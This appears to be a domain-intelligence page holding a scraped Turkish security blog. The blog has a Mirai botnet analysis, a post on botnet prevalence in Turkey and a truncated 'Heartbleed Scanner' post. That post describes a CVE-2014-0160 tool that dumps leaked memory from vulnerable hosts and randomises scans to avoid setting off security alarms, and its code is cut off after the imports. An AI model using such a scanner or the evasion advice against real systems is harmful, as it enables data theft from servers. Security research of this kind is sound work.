Help
RSS
API
Feed
Maltego
Contact
Domain > www.burakcifter.com
×
More information on this domain is in
AlienVault OTX
Is this malicious?
Yes
No
DNS Resolutions
Date
IP Address
2017-04-17
208.113.155.203
(
ClassC
)
2025-01-01
173.236.243.46
(
ClassC
)
Port 80
HTTP/1.1 200 OKDate: Wed, 01 Jan 2025 12:47:58 GMTServer: ApacheLink: http://www.burakcifter.com/wp-json/>; relhttps://api.w.org/Upgrade: h2Connection: Upgrade, closeCache-Control: max-age600Expires: Wed, 01 Jan 2025 12:57:58 GMTVary: Accept-Encoding,User-AgentTransfer-Encoding: chunkedContent-Type: text/html; charsetUTF-8 !DOCTYPE html PUBLIC -//W3C//DTD XHTML 1.0 Transitional//EN http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd>html xmlnshttp://www.w3.org/1999/xhtml langen-US>head profilehttp://gmpg.org/xfn/11>meta http-equivContent-Type contenttext/html; charsetUTF-8 />title> sekureller/title>link relstylesheet hrefhttp://www.burakcifter.com/wp-content/themes/enterprise/style.css typetext/css mediascreen />link relpingback hrefhttp://www.burakcifter.com/xmlrpc.php />meta namerobots contentmax-image-preview:large /> style>img:is(sizesauto i, sizes^auto, i) { contain-intrinsic-size: 3000px 1500px }/style> link relalternate typeapplication/rss+xml titlesekureller » Feed hrefhttp://www.burakcifter.com/feed/ />link relalternate typeapplication/rss+xml titlesekureller » Comments Feed hrefhttp://www.burakcifter.com/comments/feed/ />script typetext/javascript>/* !CDATA */window._wpemojiSettings {baseUrl:https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/,ext:.png,svgUrl:https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/,svgExt:.svg,source:{concatemoji:http:\/\/www.burakcifter.com\/wp-includes\/js\/wp-emoji-release.min.js?ver6.7.1}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t{supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var tnew Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data));return t.every(function(e,t){return ert})}function u(e,t,n){switch(t){caseflag:return n(e,\ud83c\udff3\ufe0f\u200d\u26a7\ufe0f,\ud83c\udff3\ufe0f\u200b\u26a7\ufe0f)?!1:!n(e,\ud83c\uddfa\ud83c\uddf3,\ud83c\uddfa\u200b\ud83c\uddf3)&&!n(e,\ud83c\udff4\udb40\udc67\udb40\udc62\udb40\udc65\udb40\udc6e\udb40\udc67\udb40\udc7f,\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f);caseemoji:return!n(e,\ud83d\udc26\u200d\u2b1b,\ud83d\udc26\u200b\u2b1b)}return!1}function f(e,t,n){var rundefined!typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement(canvas),ar.getContext(2d,{willReadFrequently:!0}),o(a.textBaselinetop,a.font600 32px Arial,{});return e.forEach(function(e){oet(a,e,n)}),o}function t(e){var ti.createElement(script);t.srce,t.defer!0,i.head.appendChild(t)}undefined!typeof Promise&&(owpEmojiSettingsSupports,sflag,emoji,n.supports{everything:!0,everythingExceptFlag:!0},enew Promise(function(e){i.addEventListener(DOMContentLoaded,e,{once:!0})}),new Promise(function(t){var nfunction(){try{var eJSON.parse(sessionStorage.getItem(o));if(objecttypeof e&&numbertypeof e.timestamp&&(new Date).valueOf()e.timestamp+604800&&objecttypeof e.supportTests)return e.supportTests}catch(e){}return null}();if(!n){if(undefined!typeof Worker&&undefined!typeof OffscreenCanvas&&undefined!typeof URL&&URL.createObjectURL&&undefined!typeof Blob)try{var epostMessage(+f.toString()+(+JSON.stringify(s),u.toString(),p.toString().join(,)+));,rnew Blob(e,{type:text/javascript}),anew Worker(URL.createObjectURL(r),{name:wpTestEmojiSupports});return void(a.onmessagefunction(e){c(ne.data),a.terminate(),t(n)})}catch(e){}c(nf(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supportstet,n.supports.everythingn.supports.everything&&n.supportst,flag!t&&(n.supports.everythingExceptFlagn.supports.everythingExceptFlag&&n.supportst);n.supports.everythingExceptFlagn.supports.everythingExceptFlag&&!n.supports.flag,n.DOMReady!1,n.readyCallbackfunction(){n.DOMReady!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(en.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);/* > *//script>style idwp-emoji-styles-inline-css typetext/css> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 0.07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; }/style>link relstylesheet idwp-block-library-css hrefhttp://www.burakcifter.com/wp-includes/css/dist/block-library/style.min.css?ver6.7.1 typetext/css mediaall />style idclassic-theme-styles-inline-css typetext/css>/*! This file is auto-generated */.wp-block-button__link{color:#fff;background-color:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}/style>style idglobal-styles-inline-css typetext/css>:root{--wp--preset--aspect-ratio--square: 1;--wp--preset--aspect-ratio--4-3: 4/3;--wp--preset--aspect-ratio--3-4: 3/4;--wp--preset--aspect-ratio--3-2: 3/2;--wp--preset--aspect-ratio--2-3: 2/3;--wp--preset--aspect-ratio--16-9: 16/9;--wp--preset--aspect-ratio--9-16: 9/16;--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg,rgba(6,147,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradient(135deg,rgba(252,185,0,1) 0%,rgba(255,105,0,1) 100%);--wp--preset--gradient--luminous-vivid-orange-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%,rgb(151,120,209) 20%,rgb(207,42,186) 40%,rgb(238,44,130) 60%,rgb(251,105,98) 80%,rgb(254,248,76) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--wp--preset--gradient--luminous-dusk: linear-gradient(135deg,rgb(255,203,112) 0%,rgb(199,81,192) 50%,rgb(65,88,208) 100%);--wp--preset--gradient--pale-ocean: linear-gradient(135deg,rgb(255,245,203) 0%,rgb(182,227,212) 50%,rgb(51,167,181) 100%);--wp--preset--gradient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--preset--shadow--natural: 6px 6px 9px rgba(0, 0, 0, 0.2);--wp--preset--shadow--deep: 12px 12px 50px rgba(0, 0, 0, 0.4);--wp--preset--shadow--sharp: 6px 6px 0px rgba(0, 0, 0, 0.2);--wp--preset--shadow--outlined: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flex{display: flex;}.is-layout-flex{flex-wrap: wrap;align-items: center;}.is-layout-flex > :is(*, div){margin: 0;}body .is-layout-grid{display: grid;}.is-layout-grid > :is(*, div){margin: 0;}:where(.wp-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-color{color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-color{color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-color{color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-color{color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-color{color: var(--wp--preset--color--vivid-purple) !important;}.has-black-background-color{background-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-background-color{background-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-background-color{background-color: var(--wp--preset--color--white) !important;}.has-pale-pink-background-color{background-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-background-color{background-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-background-color{background-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-background-color{background-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-background-color{background-color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-background-color{background-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-background-color{background-color: var(--wp--preset--color--vivid-purple) !important;}.has-black-border-color{border-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-border-color{border-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-border-color{border-color: var(--wp--preset--color--white) !important;}.has-pale-pink-border-color{border-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-border-color{border-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-border-color{border-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-border-color{border-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-border-color{border-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-border-color{border-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-border-color{border-color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-border-color{border-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-border-color{border-color: var(--wp--preset--color--vivid-purple) !important;}.has-vivid-cyan-blue-to-vivid-purple-gradient-background{background: var(--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple) !important;}.has-light-green-cyan-to-vivid-green-cyan-gradient-background{background: var(--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan) !important;}.has-luminous-vivid-amber-to-luminous-vivid-orange-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange) !important;}.has-luminous-vivid-orange-to-vivid-red-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-orange-to-vivid-red) !important;}.has-very-light-gray-to-cyan-bluish-gray-gradient-background{background: var(--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray) !important;}.has-cool-to-warm-spectrum-gradient-background{background: var(--wp--preset--gradient--cool-to-warm-spectrum) !important;}.has-blush-light-purple-gradient-background{background: var(--wp--preset--gradient--blush-light-purple) !important;}.has-blush-bordeaux-gradient-background{background: var(--wp--preset--gradient--blush-bordeaux) !important;}.has-luminous-dusk-gradient-background{background: var(--wp--preset--gradient--luminous-dusk) !important;}.has-pale-ocean-gradient-background{background: var(--wp--preset--gradient--pale-ocean) !important;}.has-electric-grass-gradient-background{background: var(--wp--preset--gradient--electric-grass) !important;}.has-midnight-gradient-background{background: var(--wp--preset--gradient--midnight) !important;}.has-small-font-size{font-size: var(--wp--preset--font-size--small) !important;}.has-medium-font-size{font-size: var(--wp--preset--font-size--medium) !important;}.has-large-font-size{font-size: var(--wp--preset--font-size--large) !important;}.has-x-large-font-size{font-size: var(--wp--preset--font-size--x-large) !important;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}:where(.wp-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:root :where(.wp-block-pullquote){font-size: 1.5em;line-height: 1.6;}/style>link relstylesheet idmt-shcore-style-css hrefhttp://www.burakcifter.com/wp-content/plugins/syntax-highlighter-mt/styles/shCore.css?ver2.2.5 typetext/css mediaall />link relstylesheet idmt-theme-style-css hrefhttp://www.burakcifter.com/wp-content/plugins/syntax-highlighter-mt/styles/shThemeDefault.css?ver2.2.5 typetext/css mediaall />script typetext/javascript srchttp://www.burakcifter.com/wp-content/plugins/syntax-highlighter-mt/scripts/shCore.js?ver2.2.5 idmt-shcore-js>/script>script typetext/javascript srchttp://www.burakcifter.com/wp-content/plugins/syntax-highlighter-mt/scripts/shAutoloader.js?ver2.2.5 idmt-shautoloader-js>/script>link relhttps://api.w.org/ hrefhttp://www.burakcifter.com/wp-json/ />link relEditURI typeapplication/rsd+xml titleRSD hrefhttp://www.burakcifter.com/xmlrpc.php?rsd />meta namegenerator contentWordPress 6.7.1 />style typetext/css>.recentcomments a{display:inline !important;padding:0 !important;margin:0 !important;}/style> style typetext/css> #header h1, #header h1 a, #header h1 a:visited, #header h4, #header h4 a, #header h4 a:visited, .header-left { color: #333333; } /style>/head>body classhome blog>div idheader> div classheader-left> h1>a hrefhttp://www.burakcifter.com/>sekureller/a>/h1> p iddescription>all->evil->uid(0)/p> /div> div classheader-right> form methodget idsearchform actionhttp://www.burakcifter.com/ > div>label classhidden fors>Search:/label> input typetext value names ids /> input typesubmit idsearchsubmit valueGo />/div> /form> /div>/div>div idaccess> div idnav> div idsupernav classnavleft nav> div classmenu>ul>li classcurrent_page_item>a hrefhttp://www.burakcifter.com/>Home/a>/li>li classpage_item page-item-6>a hrefhttp://www.burakcifter.com/hakkinda/>Hakkinda/a>/li>/ul>/div> /div> div classnavright> a classrsslink relnofollow hrefhttp://www.burakcifter.com/feed/>Posts/a> a classrsslink relnofollow hrefhttp://www.burakcifter.com/comments/feed/>Comments/a> /div> /div> div idsubnav classsubnav nav> div classmenu> ul> li classcat-item cat-item-21>a hrefhttp://www.burakcifter.com/category/blog/>blog/a>/li> li classcat-item cat-item-1>a hrefhttp://www.burakcifter.com/category/uncategorized/>Uncategorized/a>/li> /ul> /div> /div>/div>div idwrap>div idcontent> div idcontent-left> div classpost-179 post type-post status-publish format-standard hentry category-blog tag-ddos tag-internet-of-things tag-iot tag-malware tag-mirai tag-worm> div classentry> h2>a hrefhttp://www.burakcifter.com/mirai-bot-teknik-analizi/>Mirai Bot Teknik Analizi/a>/h2> div classpost-info> p> span classtime>December 31, 2016/span> span classpost-comments>a hrefhttp://www.burakcifter.com/mirai-bot-teknik-analizi/#respond>Leave a Comment/a>/span> /p> /div> h3>MIRAI Bot Nedir Ve Neden Bu Kadar Önemlidir?/h3>p>İnternete bağlı nesneleri, yani DVR, IP tabanlı kamera, uydu alıcısı, ev tipi küçük yönlendirici cihazlar (ADSL router modem) gibi aygıtları hedef alan bir zararlı bot yazılımıdır./p>p>Bugüne kadar büyük ölçekli bir çok DDoS ile karşılaşıldı, 2000-2010 yılları arasında internet üzerinde çok hızlı yayılan ve çok hasar veren bir çok zararlı yazılımla karşılaşıldı. Fakat bunların hiç birisi kullandığımız kişisel bilgisayarlar yerine özel olarak internete bağlı nesneleri, farklı işlemci mimarisine sahip ağa bağlı cihazlarını hedef alarak yayılmamıştı. Bu özelliğiyle Mirai istisnai bir konuma sahip belki de benzer saldırıların öncüsü. Bu istisnai durumu ve 21 Ekim’de başlayan saldırıların en yaygın kullanılan internet servislerini aksatması Mirai Bot’u bir anda tüm dünyanın gündemine taşıdı./p>h3>Hangi Zayıflığı Kullanır?/h3>p>Mirai, internete bağlı nesnelerin çoğunun güvenlik tedbirleri göz önünde bulundurulmadan üretilmesi, varsayılan kullanıcı adı/parolalar ile internete bağlanması ve bu cihazları kullanan ev kullanıcılarının bir çoğunun bu cihazların güvenliğini sağlamak konusunda herhangi bir bilgisi olmamasından yola çıkarak internet üzerindeki bu cihazları hedef almaktadır. Temel olarak sistemleri ele geçirmek için kullandığı güvenlik zafiyetine “Zayıf veya varsayılan kullanıcı adı/parola” diyebiliriz./p>p>Mirai, kendi içerisinde 61 zayıf ve standart kullanıcı adı/parola barındırır ve internet üzerinde bu zayıf parolaları kullanan cihazları bularak bu cihazları ele geçirir./p>p> a hrefhttp://www.burakcifter.com/mirai-bot-teknik-analizi/#more-179 classmore-link>Read more of this post/a>/p>div classclear>/div> /div> div classpost-meta> p> span classcategories>Filed under a hrefhttp://www.burakcifter.com/category/blog/ relcategory tag>blog/a>/span> span classtags>Tagged with a hrefhttp://www.burakcifter.com/tag/ddos/ reltag>ddos/a>, a hrefhttp://www.burakcifter.com/tag/internet-of-things/ reltag>internet of things/a>, a hrefhttp://www.burakcifter.com/tag/iot/ reltag>iot/a>, a hrefhttp://www.burakcifter.com/tag/malware/ reltag>malware/a>, a hrefhttp://www.burakcifter.com/tag/mirai/ reltag>mirai/a>, a hrefhttp://www.burakcifter.com/tag/worm/ reltag>worm/a>/span> /p> /div> /div> div classpost-173 post type-post status-publish format-standard hentry category-blog tag-botnet tag-cyber-espionag tag-cyber-warfare tag-ddos> div classentry> h2>a hrefhttp://www.burakcifter.com/turkiyenin-botnet-durumu/>Türkiye’nin Botnet Durumu/a>/h2> div classpost-info> p> span classtime>October 5, 2016/span> span classpost-comments>a hrefhttp://www.burakcifter.com/turkiyenin-botnet-durumu/#respond>Leave a Comment/a>/span> /p> /div> p> /p>p>Türkiye’nin EMEA bölgesinde botnet barındırma sıralamasında ilk sırada olduğunu gösteren bir rapor yayınlandı. Şehirler sıralamasında ise İstanbul ve Ankara en fazla botnet bulunan ilk iki şehir./p>p>a hrefhttp://www.burakcifter.com/wp-content/uploads/2016/10/Turkey-Botnet.png>img fetchpriorityhigh decodingasync classaligncenter wp-image-174 size-large srchttp://www.burakcifter.com/wp-content/uploads/2016/10/Turkey-Botnet-1024x550.png altturkey-botnet width549 height295 srcsethttp://www.burakcifter.com/wp-content/uploads/2016/10/Turkey-Botnet-1024x550.png 1024w, http://www.burakcifter.com/wp-content/uploads/2016/10/Turkey-Botnet-300x161.png 300w, http://www.burakcifter.com/wp-content/uploads/2016/10/Turkey-Botnet-768x413.png 768w, http://www.burakcifter.com/wp-content/uploads/2016/10/Turkey-Botnet.png 1708w sizes(max-width: 549px) 100vw, 549px />/a>/p>p styletext-align: center;>em>Kaynak: Symantec EMEA DDoS Report/em>/p>p>Saldırganların botnet kullanım amaçları ve yöntemlerini daha iyi anlamamız gerekiyor. Son zamanlarda çok bahsettiğimiz hedefli saldırılardan öncesinde saldırganlar da yaygın bir kitleye ulaşmayı hedefliyorlardı./p>p>Botnet’ler eskiden beri sadece DDoS saldırıları için kullanılmıyorlar. Bulaşılan sistemdeki kredi kartı bilgilerini, e-posta hesap bilgilerini veya saldırgan için yararlı olabilecek çeşitli verileri almak için de kullanılmaktalar./p>p>Son yıllarda çoğunlukla hedefli saldırıların engellenmesindeki zorluğu aşmayı belki de bir teknik bir becerinin göstergesi ve rekabet gördüğümüz için çok odaklandık ama geleneksel tehditler de yakamızı bırakmış değil. Teknikler geleneksel olsa da, yeni altın madeni bulaşılan sistemdeki bilgi olduğu için, saldırganlar da “serpme” yaptıktan sonra bulaşılan sistemleri tek tek inceliyorlar. Bu sistemlerin bir banka çalışanının veya kamu görevlisinin bilgisayarı olup olmadığını, sistemlerde kaldıraç olarak kullanabilecekleri herhangi bir bilgi kırıntısı bulunup bulunmadığına bakıyorlar. Eğer bulaştığı sistem “kayda değer bilgiler” barındırıyorsa veya yayılmaya değer bir ağa bağlıysa; bu sistemlerle özel olarak ilgilenmeye içeride yayılmaya başlıyorlar. Buraya kadar hedefli olmayan ve rastgele yayılan saldırganın adımları bu aşamadan sonra gelişmiş hedefli saldırılardaki “kill-chain” dediğimiz ölüm zincirinin devamı oluyor./p>p> /p>p>a hrefhttp://www.burakcifter.com/wp-content/uploads/2016/10/Screen-Shot-2016-10-05-at-22.20.30.png>img decodingasync classsize-large wp-image-175 srchttp://www.burakcifter.com/wp-content/uploads/2016/10/Screen-Shot-2016-10-05-at-22.20.30-1024x317.png altHedefli Saldiri Zinciri width549 height170 srcsethttp://www.burakcifter.com/wp-content/uploads/2016/10/Screen-Shot-2016-10-05-at-22.20.30-1024x317.png 1024w, http://www.burakcifter.com/wp-content/uploads/2016/10/Screen-Shot-2016-10-05-at-22.20.30-300x93.png 300w, http://www.burakcifter.com/wp-content/uploads/2016/10/Screen-Shot-2016-10-05-at-22.20.30-768x237.png 768w sizes(max-width: 549px) 100vw, 549px />/a>/p>p> /p>p>Botnet’lerin/zararlı yazılımların sadece DDoS saldırıları sayesinde oluşturdukları etkileri çeşitli küresel şirketlerin hizmet veremez hale gelmesinde uzaktan görmüştük. Rusya ile yaşanan uçak krizinin hemen akabinde de DDoS saldırılarının bankalarımız ve kamu sistemlerimizdeki etkisini kendi ülkemizde yaşamış olduk. Bu esnada ortaya çıkan bazı veriler, DDoS saldırılarını gerçekleştiren botnet’lerin ciddi bir kısmının da Türkiye’de konuşlanmış olduğuydu; yani içeriden vurulduk./p>p>Botnet’ler/zararlı yazılımlar eliyle DDoS saldırısı yapabilme kabiliyetinin artık stratejik bir güç veya en hafif değerlendirmeyle siber operasyon kabiliyeti olarak tanımlandığı bir dönemdeyiz. Ofansif olarak bu güce sahip olmak gerektiği gibi, defansif olarak hem DDoS’la hem de bunun asıl kaynağı olan botnet’lerle mücadeleye yoğunluk vermemiz gerekiyor. Botnet’lerle mücadele edilmesi hem ülke içi ağlardan kaynaklanacak DDoS saldırılarının önüne geçecek hem de serpme saldırılarla kritik verilerin sızdırılmasını engelleyecektir./p>p>EMEA botnet istatistiklerinde şehir sıralamasında Ankara’nın ikinci sırada olması kabul edilebilir bir durum değil. Ankara’daki sistemlerin büyük oranda kamu ve üniversite sistemleri olduğunu düşünürsek, botnet bulaşma adedinin EMEA’da ikinci sırada olması demek; kamu sistemlerimizin ve akademik ağlarımızın botnet’e dahil olmak bir yana; zararlı yazılım kaynadığını gösteriyor. Bu zararlı yazılımlarla bilgi çalma ve izleme operasyonları yapılabileceği, bulaşılan kurumlarda saldırganların yatay ve derinlemesine erişim elde etmeye devam edeceği de düşünülürse aslında siber casusluk için deney tahtası haline geldiğimiz değerlendirmesini yapmak isabetli olur./p>p>Botnet ile mücadele etmek elbette kolay değil. Sadece ISP’lerle çözülebilecek bir konu da değil. Son kullanıcının bilinçlendirilmesi de bu işin bir bacağı, ISP’lerin zararlı yazılım yayılmasını engellemek için tehdit istihbaratı üretip, trafik analizi ve zararlı yazılım tespit sistemleri kullanmaları da bu bu işin bir bacağı. Çok boyutlu ve katmanlı yaklaşım gerektiriyor./p>p>Telekom operatörleri seviyesinde DDoS ile mücadele etmek için güvenlik önlemleri alınsa da; ülke içerisindeki botnet’lerle, zararlı yazılımlarla mücadele etmedikçe hem ülke içinde kaynağı olan DDoS saldırılarına karşı anlamlı bir çözüm elde edemeyiz hem de siber espiyonaj için herhangi bir tedbir almamış oluruz./p>p>Siber kabiliyetlerin caydırıcı güç olarak kullanıldığı, devletler arası ilişkilerde artan gerginlikte bir kademe olarak kullanıldığı çağdayız. Bunun kabiliyetin en görünüz yüzü DDoS, arkasındaki altyapı ise zararlı yazılımlarla oluşturulan botnet’ler. Hem kurumların hem de güvenlik çözümleri sağlayanların öncelikleri belirlerken bu konuya ağırlık vermesi gerekli./p>p> /p>p> /p>div classclear>/div> /div> div classpost-meta> p> span classcategories>Filed under a hrefhttp://www.burakcifter.com/category/blog/ relcategory tag>blog/a>/span> span classtags>Tagged with a hrefhttp://www.burakcifter.com/tag/botnet/ reltag>botnet/a>, a hrefhttp://www.burakcifter.com/tag/cyber-espionag/ reltag>cyber espionag/a>, a hrefhttp://www.burakcifter.com/tag/cyber-warfare/ reltag>cyber warfare/a>, a hrefhttp://www.burakcifter.com/tag/ddos/ reltag>ddos/a>/span> /p> /div> /div> div classpost-167 post type-post status-publish format-standard hentry category-blog tag-heartbleed tag-openssl> div classentry> h2>a hrefhttp://www.burakcifter.com/heartbleed-scanner/>Heartbleed Scanner/a>/h2> div classpost-info> p> span classtime>September 24, 2015/span> span classpost-comments>a hrefhttp://www.burakcifter.com/heartbleed-scanner/#respond>Leave a Comment/a>/span> /p> /div> p>Heartbleed olarak bilinen OpenSSL bellek sizintisi zafiyeti (CVE-2014-0160) icin basit test araclari disinda dogru duzgun bir scanner olmadigi icin yapip paylasayim dedim./p>p>Jared Stafford tarafindan gelistirilen python koduna yaptigim eklentiler sunlar;/p>ul>li>IMAP, SMTP, POP3 protokolu destegi/li>li>Network taramasi yapma destegi (CIDR notasyonunda girdi verilebiliyor)/li>li>Zafiyet buldugunda sizan bellegi bir dosyaya kaydetme destegi/li>li>Zaman asimi belirtme destegi (performans optimizasyonu icin)/li>li>Hedefleri bir listeden alma destegi (ozellikle elinizde nmap veya zmap ile taramalarinizdan zaten https/smtps/vb servisleri acik oldugunu bildiginiz hedefler varsa cok faydali, tarama suresini hizlandiriyor)/li>li>Hedef adres listesini karisik olarak tarama destegi (genis networkleri tararken duz siradan taramak guvenlik sistemlerini alarma gecirebilir, farkli segmentlerden taramalar da yapmasi ile bundan biraz kurtulabilirsiniz)/li>/ul>p> /p>p>GitHub : https://github.com/hybridus/heartbleedscanner/p>blockquote>p> br />!-- HTML generated using hilite.me -->/p>div stylebackground: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;>pre stylemargin: 0; line-height: 125%>span stylecolor: #008800; font-style: italic>#!/usr/bin/env python/span>span stylecolor: #008800; font-style: italic># I've added some features to the original work of Jared Stafford./span>span stylecolor: #008800; font-style: italic>#/span>span stylecolor: #008800; font-style: italic># -t parameter to optimize the timeout in seconds./span>span stylecolor: #008800; font-style: italic># -f parameter to log the memleak of vulnerable systems./span>span stylecolor: #008800; font-style: italic># -n parameter to scan entire network./span>span stylecolor: #008800; font-style: italic># -i parameter to scan from a list file. Useful if you already have targets./span>span stylecolor: #008800; font-style: italic># -r parameter to randomize the IP addresses to avoid linear scanning./span>span stylecolor: #008800; font-style: italic># -s parameter to exploit services that requires plaintext command to start SSL/TLS (HTTPS/SMTP/POP3/IMAP)/span>span stylecolor: #008800; font-style: italic>#/span>span stylecolor: #008800; font-style: italic># Added socket error handler which causes the original version to exit in cases./span>span stylecolor: #008800; font-style: italic>#/span>span stylecolor: #008800; font-style: italic># hybridus (hybridus@gmail.com)/span>span stylecolor: #008800; font-style: italic># CVE-2014-0160/span>span stylecolor: #AA22FF; font-weight: bold>import/span> span stylecolor: #0000FF; font-weight: bold>sys/span>span stylecolor: #AA22FF; font-weight: bold>import/span> span stylecolor: #0000FF; font-weight: bold>struct/span>span stylecolor: #AA22FF; font-weight: bold>import/span> span stylecolor: #0000FF; font-weight: bold>socket/span>span stylecolor: #AA22FF; font-weight: bold>import/span> span stylecolor: #0000FF; font-weight: bold>time/span>span stylecolor: #AA22FF; font-weight: bold>import/span> span stylecolor: #0000FF; font-weight: bold>select/span>span stylecolor: #AA22FF; font-weight: bold>import/span> span stylecolor: #0000FF; font-weight: bold>re/span>span stylecolor: #AA22FF; font-weight: bold>import/span> span stylecolor: #0000FF; font-weight: bold>errno/span>span stylecolor: #AA22FF; font-weight: bold>import/span> span stylecolor: #0000FF; font-weight: bold>Queue/span>span stylecolor: #AA22FF; font-weight: bold>import/span> span stylecolor: #0000FF; font-weight: bold>threading/span>span stylecolor: #AA22FF; font-weight: 